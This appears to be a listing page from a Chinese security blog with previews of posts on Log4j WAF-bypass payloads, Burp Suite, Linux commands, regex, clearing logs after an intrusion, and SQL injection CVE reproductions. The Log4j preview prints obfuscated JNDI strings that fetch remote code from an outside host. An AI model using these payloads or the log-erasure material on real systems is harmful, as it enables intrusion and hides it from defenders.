![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
网络安全
文章平均质量分 52
CYJoe
这个作者很懒,什么都没留下…
展开
-
【WEB安全】Log4j Bypass WAF Payloads
Log4j Bypass WAF Payloads${jndi:ldap://127.0.0.1:1389/ badClassName} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${jndi:rmi:原创 2021-12-14 11:02:18 · 6006 阅读 · 0 评论 -
BurpSuite ——AuthMatrix插件安装与使用
BurpSuite ——AuthMatrix插件安装与使用转载自:https://blog.csdn.net/edisonjh/article/details/106275819BurpSuite AuthMatrix插件安装Burp Suite BApp Store安装AuthMatrix可以通过Burp Suite BApp Store安装。在BurpSuite中,选择Extender选项卡,选择BApp Store,选择AuthMatrix,然后单击install。使用前准备burp可以转载 2021-02-05 17:21:13 · 2390 阅读 · 1 评论 -
Linux系统的LOG日志文件及入侵后日志的清除
Linux系统的LOG日志文件及入侵后日志的清除UNIX网管员主要是靠系统的LOG,来获得入侵的痕迹.当然也有第三方工具记录入侵系统的痕迹,UNIX系统存放LOG文件,普通位置如下: /usr/adm - 早期版本的UNIX/var/adm - 新一点的版本使用这个位置/var/log - 一些版本的Solaris,linux BSD,Free BSD使用这个位置/etc - 多数UNIX版本把utmp放在这里,有些也把wtmp放在这里,syslog.conf在这里下面的一些文件根据你所在的目录不同而不转载 2020-11-14 11:33:49 · 953 阅读 · 0 评论 -
LINUX常用命令-系统安全篇
一、常用的shell命令1、ls [目录] --显示文件夹下有哪些内容的命令1• ls -a [目录]• 显示当前目录下的所有文件,包括隐藏文件• ls -l []• 以长格式显示文件的所有(详细)信息,简写为: ll• ls -h []• 显示文件大小的单位,便于阅读h human-readable2、新建文件夹和文件• mkdir 目录1 目录2• mkdir –p /…/A/B/C–在指定文件新建A文件夹 并在A文件夹下新建B 在新建C• mkdir -m原创 2020-11-02 15:00:41 · 885 阅读 · 0 评论 -
正则表达式简介-Linux常用
1、 [ABC]-匹配 […] 中的所有字符2、 [^ABC]-匹配除了 […] 中字符的所有字符3、 .-匹配除换行符(\n、\r)之外的任何单个字符,相等于 [^\n\r]。4、[\s\S]-匹配所有。\s 是匹配所有空白符,包括换行,\S 非空白符,包括换行5、 \w-匹配字母、数字、下划线。等价于 [A-Za-z0-9]6、 ( )-标记一个子表达式的开始和结束位置7、 *-匹配前面的子表达式零次或多次8、 .-匹配除换行符 \n 之外的任何单字符9、 [-标记一个中括号表达式的开始原创 2020-11-02 14:26:07 · 105 阅读 · 0 评论 -
CVE-2018-6376复现-Joomla!3.8.4-SQL注入漏洞
1.1漏洞原因1.1.1漏洞描述图9 CVE-2018-6376漏洞被描述为:在Joomla!在3.8.4之前,SQL语句中缺少类型转换导致Hathor postinstall消息中的SQL注入漏洞。为了预防SQL注入攻击,而将输入到应用程序中的某些数据进行了“转义(escape)”,但是这些数据却又在“未被转义(Unescaped)”的查询窗体中重复使用。此时,攻击者可能注入的是一个PAYLOAD,这样就会构成一个SQL查询语句并被执行; 当用户可控数据以不安全的方式合并到数据库SQL查询中时,原创 2020-09-16 11:40:54 · 834 阅读 · 0 评论 -
SQL注入测试-part01+02
文章目录1、利用floor()函数进行报错注入2、利用extractvalue()函数进行报错注入3、利用updatexml()函数进行报错注入4、基于时间延迟的盲注5、基于时间延迟的盲注,利用benchmark函数1、过滤了特殊符号的字符型注入2、过滤了逗号的字符型注入3、数字型注入,数据库用户名为root,可以执行load_file()函数1、利用floor()函数进行报错注入数据库版本5.5.47-0ubuntu0.14.04.1:http://IP:4606/?id=1 and(select原创 2020-09-16 11:32:59 · 206 阅读 · 0 评论 -
对CVE-2017-6089的复现-phpcollab 2.5.1的SQL注入
下载phpCollab-v2.5.1,放到web根目录下安装图1 PHP Collab 安装图2登陆账号:admin,密码:adminPHP Collab 登录添加一个项目:4.漏洞复现4.1漏洞原因4.1.1漏洞描述图 CVE-2017-6089漏洞被描述为:在phpcollab 2.5.1以及更早版本中存在SQL注入漏洞,允许远程攻击者执行任意的SQL指令。漏洞存在于3处,topics/deletetopics.php中project参数和id参数,bookmarks/d原创 2020-09-16 11:20:46 · 777 阅读 · 0 评论